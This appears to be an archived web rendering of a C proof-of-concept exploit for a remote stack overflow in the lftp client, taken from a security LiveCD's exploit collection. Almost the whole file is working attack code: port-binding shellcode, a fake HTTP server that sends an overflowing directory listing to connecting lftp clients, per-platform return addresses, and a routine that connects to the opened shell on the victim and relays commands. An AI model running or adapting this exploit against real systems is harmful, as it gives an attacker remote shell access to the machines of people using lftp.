home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ftp / lftp / lftp-exp.c < prev   
Encoding:
C/C++ Source or Header  |  2005-02-12  |  10.9 KB  |  493 lines
  1. /*
  2.  * lftp remote stack-based overflow exploit by Li0n7@voila.fr
  3.  *
  4.  * Vulnerability discovered by Ulf Harnhammar
  5. <Ulf.Harnhammar.9485@student.uu.se>
  6.  *
  7.  * Lftp versions later than 2.6.10 are prone to a remotly exploitable
  8. stack-based
  9.  * overflow in try_netscape_proxy() and try_squid_eplf( (src/HttpDir.cc).
  10. This
  11.  * bad coded proof-of-concept demonstrates the exploitation by exploiting
  12. the
  13.  * vulnerable function try_netscape_proxy() (HttpDir.cc:358) and it needs
  14. more targets
  15.  * to be efficient. Please note that this vulnerability is really hard to
  16. exploit
  17.  * since lots of parameters come into play and are different from a
  18. platform to another,
  19.  * for we have to overwrite some variables and registers before
  20. overwriting eip.
  21.  * With some time and lot of patience, you should find your own parameters
  22. by using
  23.  * GDB. Params to edit are marked with a '!' in the POC code. Moreover, I
  24. have edited
  25.  * Bighawk's port binding shellcode not to contain any white character
  26. such as \r,\t,\v,
  27.  * \f,\n or \20 because we are exploiting a sscanf function.
  28.  *
  29.  * usage: ./lftp-exp [-f <path>][-p <port>][-r <ret>][-t <target>]
  30.  * -f <path>: create <path>index.html
  31.  * -p <port>: run a fake lftp server on port <port> (default: 80)
  32.  * -r <ret>: return address you would like to use
  33.  * -t <target>: choose the target among the platforms available
  34.  * Platforms supported are:
  35.  * num: 0 - slack 9.0 - 0xbffff770
  36.  *
  37.  * For instance: ./lftp-exp -p 80 -t 0
  38.  * ./lftp-exp -f / -t 0
  39.  *
  40.  * A poil !
  41.  */
  42.  
  43. #include <stdio.h>
  44. #include <unistd.h>
  45. #include <netdb.h>
  46. #include <netinet/in.h>
  47. #include <errno.h>
  48. #include <fcntl.h>
  49. #include <unistd.h>
  50.  
  51. #define BUFFERSIZE 117 /*!*/
  52. #define SIZE 256
  53.  
  54. #define D_BACK 26112
  55. #define D_RET 0xbffff770
  56. #define D_PORT 80
  57.  
  58. #define DUMMY1 0xbffff140 /*!*/
  59. #define DUMMY2 0xbffff810 /*!*/
  60.  
  61. #define OK "cd ok, cwd=/\n"
  62.  
  63.  
  64. /* Edited bighawk 78 bytes portbinding shellcode */
  65. /* size: 80 bytes */
  66. /* Does not contain any white character i.e \r,\t,\v,\f,\n,\20 */
  67.  
  68. char shellcode[] =
  69. "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0"
  70. "\x66\x52\x50\xcd\x80\x43\x66\x53\x89\xe1\x6a\x10"
  71. "\x51\x50\x89\xe1\x52\x50\xb0\x66\xcd\x80\x89\xe1"
  72. "\xb3\x04\xb0\x66\xcd\x80\x43\xb0\x66\xcd\x80\x89"
  73. "\xd9\x93\xb0\x3f\xcd\x80\x49\x79\xf9\x52\x68\x6e"
  74. "\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53"
  75. "\x89\xe1\xb0\x28\x2c\x1d\xcd\x80";
  76.  
  77. char badc0ded[] =
  78. {0x20,0x09,0x0a,0x0b,0x0c,0x0d,0x00};
  79.  
  80. char *lftp_versions[] =
  81. {
  82.   "lftp/2.3",
  83.   "lftp/2.4.9",
  84.   "lftp/2.5.2",
  85.   "lftp/2.6.0",
  86.   "lftp/2.6.3",
  87.   "lftp/2.6.4",
  88.   "lftp/2.6.5",
  89.   "lftp/2.6.6",
  90.   "lftp/2.6.7",
  91.   "lftp/2.6.8",
  92.   "lftp/2.6.9",
  93.  
  94. };
  95.  
  96. unsigned long ret_addr = D_RET;
  97.  
  98. int back_connection(long host);
  99. int check_shellcode(char *host);
  100. void check_version();
  101. char * build(char *host);
  102. int create_file(char *path);
  103. void wait_connection(int port);
  104. long resolve_host(u_char *host_name);
  105. void die(char *argv);
  106.  
  107. struct os_ret_addr
  108. {
  109.   int num;
  110.   char *plat;
  111.   long ret;
  112. };
  113.  
  114. struct os_ret_addr exp_os[]=
  115. {
  116.   {0,"slack 9.0",0xbffff770},
  117.   {0,NULL,0}
  118. };
  119.  
  120.  
  121. int
  122. main(int argc,char *argv[])
  123. {
  124.   int i, option, port = D_PORT;
  125.   long host = 0;
  126.   char * option_list = "f:p:r:t:", path[128];
  127.  
  128.   opterr = 0;
  129.  
  130.   if (argc < 2) die(argv[0]);
  131.   while((option = getopt(argc,argv,option_list)) != -1)
  132.     switch(option)
  133.     {
  134.       case 'f':
  135.       strncpy(path,optarg,sizeof(path)-1);
  136.       path[sizeof(path)-1] = '\0';
  137.       create_file(path);
  138.       return 0;
  139.       case 'p':
  140.       port = atoi(optarg);
  141.       if(port > 65535 || port < 0) exit(-1);
  142.       break;
  143.       case 'r':
  144.       ret_addr = atol(optarg);
  145.       if(ret_addr > 0xbfffffff || ret_addr < 0x00000000) exit(1);
  146.       break;
  147.       case 't':
  148.       for(i=0; exp_os[i].plat != NULL; i++)
  149.       if(atoi(optarg) > i || atoi(optarg) < 0)
  150.       {
  151.         fprintf(stderr," Platforms supported are:\n");
  152.         for(i=0; exp_os[i].plat != NULL; i++)
  153.           fprintf(stderr," num: %i - %s -
  154. 0x%x\n",i,exp_os[i].plat,exp_os[i].ret);
  155.           exit(1);
  156.       }
  157.       ret_addr = exp_os[atoi(optarg)].ret;
  158.       break;
  159.       case '?':
  160.       fprintf(stderr,"[-] option \'%c\' invalid\n",optopt);
  161.       die(argv[0]);
  162.     }
  163.  
  164.   wait_connection(port);
  165.   return 0;
  166. }
  167.  
  168.  
  169. int
  170. check_shellcode(char *host)
  171. {
  172.   int i,j;
  173.   for(i=0;i<strlen(shellcode);i++)
  174.     for(j=0;j<strlen(badc0ded);j++)
  175.       if(shellcode[i] == badc0ded[j])
  176.       {
  177.       fprintf(stderr,"[%s] badc0ded shellcode!\n",host);
  178.       return -1;
  179.       }
  180.   return 0;
  181. }
  182.  
  183.  
  184. void
  185. check_version(char *version)
  186. {
  187.   int i;
  188.   for(i=0;i<sizeof(lftp_versions);i++)
  189.     if(!strcmp(lftp_versions[i],version))
  190.     {
  191.       fprintf(stdout,"(vulnerable).\n");
  192.       return;
  193.     }
  194.   fprintf(stdout,"(not vulnerable).\n");
  195.   return;
  196. }
  197.  
  198.  
  199. char
  200. *build(char *host)
  201. {
  202.   char *buffer,*ptr;
  203.   int i;
  204.   unsigned long *addr_ptr;
  205.  
  206.   fprintf(stdout,"[%s] Building evil string to send (using ret
  207. 0x%x)...\n",host,ret_addr);
  208.  
  209.   buffer = (char *)malloc(SIZE+1);
  210.  
  211.   if(!buffer)
  212.   {
  213.     fprintf(stderr,"[-] Can't allocate memory,exiting...\n");
  214.     exit(1);
  215.   }
  216.  
  217.   ptr = buffer;
  218.   memset(ptr,0x90,BUFFERSIZE-strlen(shellcode));
  219.   ptr += BUFFERSIZE-strlen(shellcode);
  220.  
  221.   if((i = check_shellcode(host)) < 0) exit(1);
  222.  
  223.   for(i=0;i<strlen(shellcode);i++)
  224.     *ptr++ = shellcode[i];
  225.  
  226.   /* You might need to modify the padding too */
  227.   addr_ptr = (long *)ptr;
  228.   for(i=0;i<24;i++)
  229.    *(addr_ptr++) = DUMMY1;
  230.   for(i=0;i<8;i++)
  231.    *(addr_ptr++) = DUMMY2;
  232.   *(addr_ptr++) = ret_addr; /* EIP */
  233.   *(addr_ptr++) = DUMMY2;
  234.  
  235.   ptr = (char *)addr_ptr;
  236.   *ptr = 0x0;
  237.   return buffer;
  238. }
  239.  
  240.  
  241. int
  242. create_file(char *path)
  243. {
  244.   int fd;
  245.   char buffer[512], file[256];
  246.   ssize_t written;
  247.  
  248.   memset(file,0,256);
  249.   memset(buffer,0,512);
  250.  
  251.   strcat(file,path);
  252.   strcat(file,"index.html");
  253.  
  254.   fd = open(file,O_WRONLY | O_CREAT | O_TRUNC,0644);
  255.   if(fd < 0)
  256.   {
  257.     fprintf(stderr,"[-] %s\n",strerror(errno));
  258.     exit(0);
  259.   }
  260.   snprintf(buffer,512,"<a href=\"/\">empty</a> Fri May 30 10:09:06 2001
  261. %s\n",build("+"));
  262.   written = write(fd,buffer,512);
  263.   if(written != 512)
  264.   {
  265.     fprintf(stderr,"[-] %s\n",strerror(errno));
  266.     exit(0);
  267.   }
  268.   close(fd);
  269.   fprintf(stdout,"[+] File %s successfuly created.\n",file);
  270.   return 0;
  271. }
  272.  
  273.  
  274. int
  275. back_connection(long host)
  276. {
  277.   struct sockaddr_in s;
  278.   u_char sock_buf[4096];
  279.   fd_set fds;
  280.   int fd,size;
  281.   char *command="/bin/uname -a ; /usr/bin/id;\n";
  282.  
  283.   fd = socket(AF_INET, SOCK_STREAM, 0);
  284.   if (fd < 0)
  285.   {
  286.     fprintf(stderr,"[-] %s\n",strerror(errno));
  287.     exit(1);
  288.   }
  289.  
  290.   s.sin_family = AF_INET;
  291.   s.sin_port = htons(D_BACK);
  292.   s.sin_addr.s_addr = host;
  293.  
  294.   if (connect(fd, (struct sockaddr *)&s, sizeof(struct sockaddr)) == -1)
  295.   {
  296.     fprintf(stderr,"[-] %s\n",strerror(errno));
  297.     close(fd);
  298.     return 0;
  299.   }
  300.  
  301.   fprintf(stdout, "[+] Let's rock on!\n");
  302.  
  303.   size = send(fd, command, strlen(command), 0);
  304.   if(size < 0)
  305.   {
  306.     fprintf(stderr,"[-] %s\n",strerror(errno));
  307.     close(fd);
  308.     exit(1);
  309.   }
  310.  
  311.   for (;;)
  312.   {
  313.     FD_ZERO(&fds);
  314.     FD_SET(0, &fds);
  315.     FD_SET(fd, &fds);
  316.  
  317.     if (select(255, &fds, NULL, NULL, NULL) == -1)
  318.     {
  319.       fprintf(stderr,"[-] %s\n",strerror(errno));
  320.       close(fd);
  321.       exit(1);
  322.     }
  323.  
  324.     memset(sock_buf, 0, sizeof(sock_buf));
  325.  
  326.     if (FD_ISSET(fd, &fds))
  327.     {
  328.       if (recv(fd, sock_buf, sizeof(sock_buf), 0) == -1)
  329.       {
  330.       fprintf(stderr, "[-] Connection closed by remote
  331. host,exiting...\n");
  332.       close(fd);
  333.       exit(1);
  334.       }
  335.  
  336.       fprintf(stderr, "%s", sock_buf);
  337.     }
  338.  
  339.     if (FD_ISSET(0, &fds))
  340.     {
  341.       read(0, sock_buf, sizeof(sock_buf));
  342.       write(fd, sock_buf, strlen(sock_buf));
  343.     }
  344.   }
  345.   return 0;
  346. }
  347.  
  348.  
  349. void
  350. wait_connection(int port)
  351. {
  352.   struct sockaddr_in s;
  353.   int size, fd, fd2, i, r, cancel = 0;
  354.   char data[1024], version[32], request[512];
  355.   char *ptr;
  356.   long host = 0;
  357.  
  358.   memset(data,0,1024);
  359.  
  360.   fprintf(stdout,"[+] Setting up a fake HTTP server...\n");
  361.  
  362.   fd = socket(AF_INET,SOCK_STREAM,0);
  363.   if(fd < 0)
  364.   {
  365.     fprintf(stderr,"[-] %s\n",strerror(errno));
  366.     exit(1);
  367.   }
  368.  
  369.   s.sin_family = AF_INET;
  370.   s.sin_port = htons(port);
  371.   s.sin_addr.s_addr = 0;
  372.  
  373.   bind(fd,(struct sockaddr *) &s,sizeof(s));
  374.   listen(fd,1);
  375.   size = sizeof(s);
  376.  
  377.   fprintf(stdout,"[+] Awaiting connection on port %i\n",port);
  378.  
  379.   while(1)
  380.   {
  381.     cancel = 0;
  382.     fd2 = accept(fd,(struct sockaddr *) &s, &size);
  383.  
  384.     if(!fork())
  385.     {
  386.       close(fd);
  387.       while(1)
  388.       {
  389.       memset(data,0,1024);
  390.       r = read(fd2,data,1024);
  391.       if((ptr = strstr(data,"User-Agent: lftp")) != NULL)
  392.       {
  393.         if(strstr(data,"HEAD"))
  394.         {
  395.           fprintf(stdout,"[%s] HEAD request
  396. received.\n",inet_ntoa(s.sin_addr));
  397.           size = send(fd2, OK, strlen(OK), 0);
  398.           if(size < 0)
  399.           {
  400.           fprintf(stderr,"[-] %s\n",strerror(errno));
  401.           close(fd2);
  402.           exit(1);
  403.           }
  404.         }
  405.         if(strstr(data,"GET"))
  406.         {
  407.           memset(request,0,512);
  408.           memset(version,0,32);
  409.  
  410.           strncpy(version,ptr+12,10);
  411.           version[sizeof(version)-1] = '\0';
  412.  
  413.           fprintf(stdout,"[%s] GET request
  414. received.\n",inet_ntoa(s.sin_addr));
  415.           fprintf(stdout,"[%s] Remote version of lftp: %s
  416. ",inet_ntoa(s.sin_addr),version);
  417.           check_version(version);
  418.  
  419.           snprintf(request,512,"HTTP/1.1 200 OK\n"
  420.                  "Server: thttpd/2.21 20apr2001\n"
  421.                  "Content-Type: text/html\n"
  422.                  "Date: Sun, 21 Dec 2003 16:29:44 GMT\n"
  423.                  "Last-Modified: Sun, 21 Dec 2003 16:23:41 GMT\n"
  424.                  "Accept-Ranges: bytes\n"
  425.                  "Connection: close\n\n"
  426.                  "<a href=\"/\">empty</a>\tFri May 30 10:09:06 2001
  427. %s\n",build((char*)inet_ntoa(s.sin_addr)));
  428.  
  429.           size = send(fd2, request, strlen(request), 0);
  430.           if(size < 0)
  431.           {
  432.           fprintf(stderr,"[-] %s\n",strerror(errno));
  433.           close(fd2);
  434.           exit(1);
  435.           }
  436.           sleep(2);
  437.           host = resolve_host((char *)inet_ntoa(s.sin_addr));
  438.           back_connection(host);
  439.           cancel = 1;
  440.           break;
  441.         }
  442.       }
  443.       }
  444.       if(cancel == 1) break;
  445.     }
  446.     close(fd2);
  447.   }
  448.   return;
  449. }
  450.  
  451.  
  452. long resolve_host(u_char *host_name)
  453. {
  454.   struct in_addr addr;
  455.   struct hostent *host_ent;
  456.  
  457.   addr.s_addr = inet_addr(host_name);
  458.   if (addr.s_addr == -1)
  459.   {
  460.     host_ent = gethostbyname(host_name);
  461.     if (!host_ent) return(0);
  462.     memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length);
  463.   }
  464.  
  465.   return(addr.s_addr);
  466. }
  467.  
  468.  
  469. void
  470. die(char *argv)
  471. {
  472.   int i;
  473.   fprintf(stdout,"\t Remote exploit for lftp < 2.6.10 by Li0n7\n");
  474.   fprintf(stdout,"\n usage: %s [-f <path>][-p <port>][-r <ret>][-t
  475. <target>]\n",argv);
  476.   fprintf(stdout," -f <path>: create <path>index.html\n");
  477.   fprintf(stdout," -p <port>: run a fake lftp server on port <port>
  478. (default: 80)\n");
  479.   fprintf(stdout," -r <ret>: return address you would like to use\n");
  480.   fprintf(stdout," -t <target>: choose the target among the platforms
  481. available\n");
  482.   fprintf(stdout," Platforms supported are:\n");
  483.   for(i=0; exp_os[i].plat != NULL; i++)
  484.     fprintf(stderr," num: %i - %s -
  485. 0x%x\n",i,exp_os[i].plat,exp_os[i].ret);
  486.   fprintf(stdout,"\n Vulnerability discovered by Ulf Harnhammar
  487. <Ulf.Harnhammar.9485@student.uu.se> \n");
  488.   fprintf(stdout," Contact me: Li0n7@voila.fr\n\n");
  489.   exit(1);
  490. }
  491.  
  492.  
  493.